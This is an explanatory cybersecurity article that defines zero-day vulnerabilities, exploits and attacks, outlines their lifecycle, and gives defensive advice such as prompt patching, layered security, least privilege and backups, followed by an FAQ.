What Is a Zero-Day Vulnerability?

· cybersecurity

A zero-day is a software vulnerability the vendor doesn’t yet know about — meaning there’s no patch available, and defenders have had “zero days” to fix it. When attackers find such a flaw first and exploit it, the result is a zero-day attack that even fully updated systems can’t initially stop. Here’s what zero-days are, why they’re so dangerous, and what you can actually do about them.

Reviewed and kept current by the Coppers.io editorial team — see how we research .

Breaking down the term

The phrase refers to time: developers have had zero days to address the flaw because they only learn of it once it’s already being exploited (or publicly disclosed). Three related terms get used loosely:

  • Zero-day vulnerability — the unknown, unpatched flaw itself.
  • Zero-day exploit — the technique or code that takes advantage of it.
  • Zero-day attack — actually using that exploit against targets.

Why zero-days are so dangerous

With a normal vulnerability, the vendor releases a patch and the race is to apply it before attackers strike. With a zero-day there’s no patch to apply — so update-based and signature-based defences can’t help at first. That makes zero-days prized by criminals and nation-states alike, and they can sell for large sums on grey and black markets. They’re often used in stealthy, high-value attacks before anyone realises the flaw exists.

The lifecycle of a zero-day

  1. A flaw exists in software, unknown to the vendor.
  2. Someone discovers it — a researcher, a criminal, or a broker.
  3. An exploit is developed to take advantage of it.
  4. It’s used or disclosed — attacks begin, or it’s reported to the vendor.
  5. The vendor patches it — once known, a fix is built and released.
  6. Users update — the window closes as the patch rolls out (now an “n-day”).

The dangerous window is between steps 3 and 5.

Can you defend against an unknown flaw?

You can’t patch what isn’t known yet — but you can shrink your exposure and limit the damage:

  • Update everything promptly. Most real-world attacks use known flaws; fast patching closes the window the moment a fix ships.
  • Use layered security. Firewalls , anti-malware , and a WAF can catch an exploit’s behaviour even without a signature.
  • Apply least privilege and segmentation so one compromised app can’t reach everything.
  • Enable automatic updates so patches land fast when they appear.
  • Reduce your attack surface — remove unused software and limit exposed services.
  • Back up so you can recover if ransomware arrives via a zero-day.

Zero-days and everyday users

For most people, the realistic risk isn’t being individually targeted by an exotic zero-day — it’s failing to patch known flaws quickly. Turn on automatic updates, run reputable security software, and follow good security basics , and you’ve handled the practical threat. Organisations at higher risk add threat detection and rapid incident response. The US CISA even publishes a catalog of actively exploited vulnerabilities to help prioritise patching.

The bottom line

A zero-day is a flaw the vendor doesn’t know about yet, so no patch exists — which is exactly what makes zero-day exploits so dangerous and valuable. You can’t pre-empt an unknown bug, but you can update fast, layer your defences, limit privileges, and back up, which together neutralise the vast majority of real-world attacks. The biggest everyday risk is slow patching of known flaws, so automatic updates are your best friend.

FAQs

  • It's a software flaw that the company who made the software doesn't know about yet, so no fix exists. The name reflects that developers have had zero days to patch it, leaving systems exposed until a fix is created and installed.
  • The vulnerability is the unknown flaw itself. The exploit is the code or technique that abuses it. The attack is actually using that exploit against real targets. They describe three stages of the same problem.
  • Because there's no patch and no signature for them yet, so even fully updated systems and traditional defences can't initially block them. This makes zero-days valuable to attackers and effective for stealthy, high-impact intrusions before the vendor can respond.
  • Not by patching the unknown flaw, but you can reduce risk and damage: patch known issues fast, use layered defences like firewalls and anti-malware that detect malicious behaviour, apply least privilege, limit your attack surface, and keep backups. These blunt most real-world attacks.
  • Genuine zero-days are relatively rare and often aimed at high-value targets, since they're costly to find. The far more common threat for ordinary users is attackers exploiting known, already-patched flaws on systems that simply haven't been updated yet.